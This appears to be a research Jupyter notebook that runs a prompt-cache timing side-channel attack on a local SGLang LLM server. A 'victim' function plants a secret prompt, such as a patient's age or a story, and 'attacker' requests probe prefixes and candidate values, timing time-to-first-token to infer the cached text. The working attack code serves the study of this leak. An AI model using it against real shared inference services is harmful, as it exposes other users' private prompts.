In [1]:
import time
import requests
import json
import random
import string
from sglang.utils import print_highlight
import asyncio
import aiohttp
import numpy as np
from transformers import AutoTokenizer
from datasets import load_dataset
from collections import Counter
from tqdm import tqdm
import multiprocessing
import pandas as pd
from tqdm.asyncio import tqdm_asyncio

  from .autonotebook import tqdm as notebook_tqdm


#### offline

In [None]:
import json
import pandas as pd
from collections import Counter
from tqdm import tqdm
import multiprocessing
from datasets import load_dataset
from transformers import AutoTokenizer

# ... (Previous setup code remains the same) ...

# 1. Load Resources (Assuming you ran this part already)
model_id = "meta-llama/Llama-3.2-1B-Instruct"
tokenizer = AutoTokenizer.from_pretrained(model_id)
ds = load_dataset("HuggingFaceH4/ultrachat_200k", split="train_gen")

def extract_text(batch):
    batch_text = []
    for messages in batch["messages"]:
        full_conversation = " ".join([m["content"] for m in messages])
        batch_text.append(full_conversation)
    return batch_text

def count_tokens_in_batch(batch):
    texts = extract_text(batch)
    encodings = tokenizer(texts, add_special_tokens=False)
    
    batch_counts = Counter()
    for seq in encodings["input_ids"]:
        batch_counts.update(seq)
    json_counts = json.dumps(dict(batch_counts))
    return {"json_counts": [json_counts]}

print("Tokenizing and counting in parallel...")
processed = ds.map(
    count_tokens_in_batch,
    batched=True,
    batch_size=1000,
    remove_columns=ds.column_names,
    num_proc=multiprocessing.cpu_count()
)

total_counts = Counter()
print("Aggregating partial counts...")

for row in tqdm(processed):
    # JSON keys are always strings, so total_counts will have string keys (e.g., "101": 5)
    partial_counts = json.loads(row["json_counts"])
    total_counts.update(partial_counts)

total_tokens = sum(total_counts.values())

# --- NEW LOGIC STARTS HERE ---

print("Filling in missing tokens (count=0)...")

# 1. Create DataFrame from existing counts
df = pd.DataFrame.from_dict(total_counts, orient='index', columns=['count'])

# 2. Convert index to integers (JSON made them strings)
df.index = df.index.astype(int)

# 3. REINDEX: This forces the DataFrame to have exactly rows 0 to vocab_size-1
#    'fill_value=0' ensures that any token ID not found in the counts gets a 0.
all_token_ids = range(tokenizer.vocab_size)
df = df.reindex(all_token_ids, fill_value=0)

# 4. formatting
df.index.name = 'token_id'
df.reset_index(inplace=True)

# 5. Calculate probabilities (now including the 0 count tokens)
# Note: Tokens with count 0 will have probability 0.0
total_observed = df['count'].sum()
df['probability'] = df['count'] / total_observed

print(f"Final DataFrame shape: {df.shape} (Should match vocab size: {tokenizer.vocab_size})")

# 6. Save
df.to_parquet("token_prob.parquet", engine="pyarrow", index=False)
print("Saved to token_prob.parquet (including zero-count tokens)")
tokenprob=pd.read_parquet("token_prob.parquet")
tokenprob["count"]=tokenprob["count"]+1
total=sum(tokenprob["count"].values.tolist())
tokenprob["probability"]=tokenprob["count"]/total
tokenprob.to_parquet("token_prob_norm.parquet")

In [2]:
port=37168
URL = f"http://localhost:{port}/v1/chat/completions"

In [3]:
tokenizer=AutoTokenizer.from_pretrained("meta-llama/Llama-3.2-3B-Instruct")
ds = load_dataset("HuggingFaceH4/ultrachat_200k",split="train_gen")
vocab=tokenizer.get_vocab()
tokenprob=pd.read_parquet("token_prob_norm.parquet")
candidate_ids = tokenprob['token_id'].to_numpy()
probabilities = tokenprob['probability'].to_numpy()

In [4]:
def flush_cache():
    flushurl = f"http://localhost:{port}/flush_cache"
    response=requests.post(flushurl)
    # print_highlight(response.text)
    return

def get_tokens(n=1):
    ids=np.random.choice(candidate_ids, size=n, p=probabilities,replace=False)
    tokens=[]
    for tid in ids:
        tok=tokenizer.decode([tid]).strip()
        tokens.append(tok)
    return tokens

def victim(TARGET_PROMPT,URL,flush):
    if flush:
        flush_cache()
    data = {
        "model": "default",
        "messages": [{"role": "user", "content": TARGET_PROMPT}],
        "temperature": 0,
        "session_id":0,
        "max_new_tokens":128
    }
    response = requests.post(URL, json=data)
    # print_highlight(response.json())

In [5]:
async def fetch_metrics_raw(session, prompt, request_id, URL):
    payload = {
        "model": "default", 
        "messages": [{"role": "user", "content": prompt}],
        "stream": True,
        "temperature": 0,
        "session_id":0,
        "context_length":128
    }
    start_time = time.perf_counter()
    first_token_time = None
    token_count = 0
    ttft = 0
    restext=""
    async with session.post(URL, json=payload) as response:
        if response.status != 200:
            return {"id": request_id, "error": f"HTTP {response.status}", "status": "fail"}
        async for line in response.content:
            decoded_line = line.decode('utf-8').strip()
            if decoded_line.startswith("data: "):
                json_str = decoded_line[6:]
                if json_str == "[DONE]":
                    break
                chunk = json.loads(json_str)
                delta = chunk['choices'][0]['delta']
                content = delta.get('content', '')
                if content:
                    restext+=content
                    if first_token_time is None:
                        first_token_time = time.perf_counter()
                        ttft = first_token_time - start_time
                    token_count += 1
        end_time = time.perf_counter()
        tpot = 0
        if token_count > 1 and first_token_time:
            generation_time = end_time - first_token_time
            tpot = generation_time / (token_count - 1)
        return {
            "id": request_id,
            "prompt": prompt,
            "ttft_ms": ttft * 1000 if ttft else 0,
            "tpot_ms": tpot * 1000,
            "tokens": token_count,
            "status": "success",
            "restext":restext
        }

async def main(attack_prompts, URL):
    async with aiohttp.ClientSession() as session:
        print(f"⚡ Sending {len(attack_prompts)} requests to SGLang ({URL})...\n")
        tasks = []
        for i, prompt in enumerate(attack_prompts):
            tasks.append(fetch_metrics_raw(session, prompt, i, URL))
        results = await tqdm_asyncio.gather(*tasks, desc="Attacking")
        print(f"{'ID':<3} | {'TTFT (ms)':<10} | {'TPOT (ms)':<10} | {'Tokens':<6} | {'Prompt Snippet'}")
        print("-" * 70)
        successful_results = []
        for res in results:
            if res["status"] == "success":
                print(f"{res['id']:<3} | {res['ttft_ms']:<10.2f} | {res['tpot_ms']:<10.2f} | {res['tokens']:<6} | {res['prompt'][:30]} | {res.get('restext', '')[:30]}")
                successful_results.append(res)
            else:
                print(f"{res['id']:<3} | {'ERROR':<10} | {'-':<10} | {'-':<6} | {res['error']}")
        if successful_results:
            ttfts = [r['ttft_ms'] for r in successful_results]
            tpots = [r['tpot_ms'] for r in successful_results]
            best_request = min(successful_results, key=lambda x: x['ttft_ms'])
            
            print("\n--- Summary ---")
            print(f"Avg TTFT: {np.mean(ttfts):.2f} ms")
            print(f"Avg TPOT: {np.mean(tpots):.2f} ms")
            print("-" * 30)
            print(f"Min TTFT:        {best_request['ttft_ms']:.2f} ms")
            print(f"Min TTFT Prompt: \"{best_request['prompt']}\"")
        return best_request, successful_results

In [6]:
# target_tokens=[get_tokens(1)[0] for i in range(800)]
target='''The ancient clock tower in the center of Eldoria had stopped ticking exactly one hundred years ago, at the precise moment the last King, Alaric the Just, had vanished. The hands were frozen at 11:59, a perpetual minute before midnight, a silent testament to a kingdom suspended in twilight.

For Elara, a young clockmaker with nimble fingers and a heart full of curiosity, the tower was an obsession. While others avoided its looming shadow, whispering tales of curses and ghosts, Elara saw a puzzle waiting to be solved. Her workshop, cluttered with gears, springs, and pendulums, was filled with sketches of the tower's intricate mechanism. She knew every cog, every lever, every escapement by heart, yet the reason for its paralysis remained elusive.

One crisp autumn morning, a stranger arrived in Eldoria. He was cloaked in gray, his face hidden beneath a hood, and he carried a staff of gnarled wood that seemed to hum with faint energy. He called himself Kaelen, a wanderer seeking lost knowledge. He found Elara in her workshop, examining a delicate balance wheel under a magnifying glass.

“The heart of the tower does not beat,” Kaelen said, his voice raspy like dry leaves. “Not because it is broken, but because it is waiting.”

Elara looked up, startled. “Waiting for what?”

“For the King’s return,” Kaelen replied. “Or for someone brave enough to take his place.”

Intrigued, Elara invited Kaelen to examine her blueprints. He pointed to a hidden chamber beneath the main mechanism, a detail she had missed in her years of study. “The Chronos Gem,” he explained. “A stone of immense power that regulated the flow of time within the kingdom. It was stolen the night the King disappeared.”

Elara’s eyes widened. She had heard legends of the Gem, dismissed as fairy tales. “Where is it now?”

Kaelen unrolled a faded map on her workbench. “In the Whispering Caverns, guarded by the Shadow Weaver. A creature of darkness that feeds on lost moments.”

Determined to restore the clock and perhaps uncover the fate of the lost King, Elara agreed to accompany Kaelen. They set off at dawn, leaving the silent town behind. The journey to the Whispering Caverns was arduous. They traversed dense forests where trees whispered secrets of the past, and crossed treacherous ravines bridged by precarious ropes. Along the way, Kaelen taught Elara about the magic woven into the fabric of Eldoria, a magic fading with the stagnation of time.

Finally, they reached the mouth of the caverns. The air was cold and damp, smelling of ozone and decay. Inside, shadows danced on the walls, twisting into grotesque shapes. Deeper they went, until they reached a vast underground lake. In the center, on a small island, pulsated a faint blue light—the Chronos Gem.

But guarding it was the Shadow Weaver, a monstrous spider-like entity composed of swirling darkness. Its many eyes glowed with malevolent intent. Kaelen raised his staff, casting a protective barrier of light, while Elara sprinted towards the island.

The Shadow Weaver lunged, its shadowy limbs slashing at Kaelen’s barrier. Elara reached the island, her hands trembling as she approached the Gem. It was warm to the touch, vibrating with a rhythmic pulse. She remembered Kaelen’s words: The tower is waiting.

She didn't just need to take the gem; she needed to synchronize it. Pulling a small, intricate pocket watch from her vest—her masterpiece—she placed it next to the Gem. She began to chant an ancient rhyme Kaelen had taught her, a spell of binding spell.
The Shadow Weaver shrieked.
'''

In [7]:
target_tokens=tokenizer.encode(target)
blocks=[]
prev=""
for i in range(50):
    block=tokenizer.decode(target_tokens[i*16:(i+1)*16])
    prev+=block
    blocks.append(prev)

In [None]:
data=[]

with tqdm(range(50)) as pbar:
    for b in pbar:
        for i in range(30):
            victim(target,URL, True)
            pbar.set_description_str("Flushed")
            prompt=blocks[b]
            payload = {
                "model": "default", 
                "messages": [{"role": "user", "content": prompt}],
                "stream": True,
                "temperature": 0,
                "session_id":0,
                "max_new_tokens":128
            }
            start_time = time.perf_counter()
            first_token_time = None
            token_count = 0
            ttft = 0
            restext=""
            response=requests.post(URL, json=payload,stream=True)
            if response.status_code == 200:
                for chunk in response.iter_lines(decode_unicode=False):
                    chunk = chunk.decode("utf-8")
                    if chunk and chunk.startswith("data:"):
                        if chunk == "data: [DONE]":
                            break
                        chunk = json.loads(chunk[5:].strip("\n"))
                        delta = chunk['choices'][0]['delta']
                        content = delta.get('content', '')
                        if content:
                            restext+=content
                            if first_token_time is None:
                                first_token_time = time.perf_counter()
                                ttft = first_token_time - start_time
                            token_count += 1
                end_time = time.perf_counter()
                tpot = 0
                if token_count > 1 and first_token_time:
                    generation_time = end_time - first_token_time
                    tpot = generation_time / (token_count - 1)
                    
                data.append({
                    "trial":i,
                    "prompt": prompt,
                    "ttft_ms": ttft * 1000 if ttft else 0,
                    "tpot_ms": tpot * 1000,
                    "tokens": token_count,
                    "status": "success",
                    "restext":restext
                })
                pbar.set_description_str(f"\tBlock {b}, Trial:{i}, TTFT:{ttft*1000}, TPOT:{tpot*1000}")
                
df=pd.DataFrame(data)
df.to_parquet("block_timing.parquet")

	Block 0, Trial:12, TTFT:82.57767697796226, TPOT:40.099939626668565:   0%|          | 0/50 [10:11<?, ?it/s]

#### online

In [None]:
port=37168
URL = f"http://localhost:{port}/v1/chat/completions"

In [None]:
tokenizer=AutoTokenizer.from_pretrained("meta-llama/Llama-3.2-3B-Instruct")
ds = load_dataset("HuggingFaceH4/ultrachat_200k",split="train_gen")
vocab=tokenizer.get_vocab()
tokenprob=pd.read_parquet("token_prob_norm.parquet")
candidate_ids = tokenprob['token_id'].to_numpy()
probabilities = tokenprob['probability'].to_numpy()

In [None]:
def flush_cache():
    flushurl = f"http://localhost:{port}/flush_cache"
    response=requests.post(flushurl)
    print_highlight(response.text)
    return

def get_tokens(n=1):
    ids=np.random.choice(candidate_ids, size=n, p=probabilities,replace=False)
    tokens=[]
    for tid in ids:
        tok=tokenizer.decode([tid]).strip()
        tokens.append(tok)
    return tokens

In [None]:
async def fetch_metrics_raw(session, prompt, request_id, URL):
    payload = {
        "model": "default", 
        "messages": [{"role": "user", "content": prompt}],
        "stream": True,
        "temperature": 0,
        "session_id":0,
        "context_length":128
    }
    start_time = time.perf_counter()
    first_token_time = None
    token_count = 0
    ttft = 0
    restext=""
    async with session.post(URL, json=payload) as response:
        if response.status != 200:
            return {"id": request_id, "error": f"HTTP {response.status}", "status": "fail"}
        async for line in response.content:
            decoded_line = line.decode('utf-8').strip()
            if decoded_line.startswith("data: "):
                json_str = decoded_line[6:]
                if json_str == "[DONE]":
                    break
                chunk = json.loads(json_str)
                delta = chunk['choices'][0]['delta']
                content = delta.get('content', '')
                if content:
                    restext+=content
                    if first_token_time is None:
                        first_token_time = time.perf_counter()
                        ttft = first_token_time - start_time
                    token_count += 1
        end_time = time.perf_counter()
        tpot = 0
        if token_count > 1 and first_token_time:
            generation_time = end_time - first_token_time
            tpot = generation_time / (token_count - 1)
        return {
            "id": request_id,
            "prompt": prompt,
            "ttft_ms": ttft * 1000 if ttft else 0,
            "tpot_ms": tpot * 1000,
            "tokens": token_count,
            "status": "success",
            "restext":restext
        }

async def main(attack_prompts, URL):
    async with aiohttp.ClientSession() as session:
        print(f"⚡ Sending {len(attack_prompts)} requests to SGLang ({URL})...\n")
        tasks = []
        for i, prompt in enumerate(attack_prompts):
            tasks.append(fetch_metrics_raw(session, prompt, i, URL))
        results = await tqdm_asyncio.gather(*tasks, desc="Attacking")
        print(f"{'ID':<3} | {'TTFT (ms)':<10} | {'TPOT (ms)':<10} | {'Tokens':<6} | {'Prompt Snippet'}")
        print("-" * 70)
        successful_results = []
        for res in results:
            if res["status"] == "success":
                print(f"{res['id']:<3} | {res['ttft_ms']:<10.2f} | {res['tpot_ms']:<10.2f} | {res['tokens']:<6} | {res['prompt'][:30]} | {res.get('restext', '')[:30]}")
                successful_results.append(res)
            else:
                print(f"{res['id']:<3} | {'ERROR':<10} | {'-':<10} | {'-':<6} | {res['error']}")
        if successful_results:
            ttfts = [r['ttft_ms'] for r in successful_results]
            tpots = [r['tpot_ms'] for r in successful_results]
            best_request = min(successful_results, key=lambda x: x['ttft_ms'])
            
            print("\n--- Summary ---")
            print(f"Avg TTFT: {np.mean(ttfts):.2f} ms")
            print(f"Avg TPOT: {np.mean(tpots):.2f} ms")
            print("-" * 30)
            print(f"Min TTFT:        {best_request['ttft_ms']:.2f} ms")
            print(f"Min TTFT Prompt: \"{best_request['prompt']}\"")
        return best_request, successful_results

In [None]:
def victim(TARGET_PROMPT,URL,flush):
    if flush:
        flush_cache()
    data = {
        "model": "default",
        "messages": [{"role": "user", "content": TARGET_PROMPT}],
        "temperature": 0,
        "session_id":0    
    }
    response = requests.post(URL, json=data)
    print_highlight(response.json())

In [None]:
while(True):
    prompts=get_tokens(50)
    if "is" in prompts:
        break

In [None]:
victim("The patient's age is 5. Please consider age-related health considerations and risks.",URL,True)
victim("The patient's age is %. Please consider age-related health considerations and risks.",URL,False)


In [None]:
conprompts=[f"The patient's age is {str(i)}. Please consider age-related health considerations and risks." for i in range(10)]
best,suc=await main(conprompts, URL)

In [None]:
dfsuc=pd.DataFrame(suc)

In [None]:
dfsuc.sort_values("ttft_ms")